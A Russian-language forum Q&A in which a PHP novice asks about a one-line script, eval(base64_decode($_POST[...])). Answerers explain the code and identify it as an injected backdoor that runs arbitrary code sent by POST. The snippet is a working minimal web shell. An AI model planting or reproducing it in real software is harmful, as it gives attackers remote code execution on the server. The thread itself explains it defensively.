Не могу разобрать код на PHP

Question

[Secret0]

Привет

В общем нужно разобрать код на PHP. Он хоть и маленький, но в PHP я полный чайник.

<?php
eval(base64_decode($_POST['n22ec2b']));
?>

Спасибо.

Answer 1

[lookid]

eval - фукнция, которая выполняет произвольный код. Например eval('print 1+ 1')
base64_decode - декодирует и возвращает оригинальные данные
$_POST - Ассоциативный массив данных, переданных скрипту через HTTP метод POST
'n22ec2b' - ключ, по которому вы хотите получить данные, обычно поле формы

а вообще это инъекция какая-то eval(base64_decode("...")), там может быть какой угодно вредоносный код

Comments

[Secret0]

Возможно ли как-то увидеть код который выполняется eval?

[lookid]

print base64_decode(...)

Answer 2

[Сергей Протько]

base64_decode($_POST['n22ec2b']) - передаем в $_POST['n22ec2b'] код зашифрованный в base64 и выполняем его через eval.

В следующий раз потрудитесь воспользоваться документацией.

Comments

[Secret0]

Спасибо, но как я написал, в PHP я не знаю вообще ничего. Можно поподробнее что такое $POST. Я уже гуглил, но не нашел ответа

[Snewer]

@Secret0 вы не могли такого написать, поскольку эта дыра используется злоумышленниками. Он с легкостью может, например, удалить ОС или что то подобное

[Сергей Протько]

@Snewer ну удалить ОС врят-ли, это скрипт должен из под рута запускаться. Но гадостей натворить может.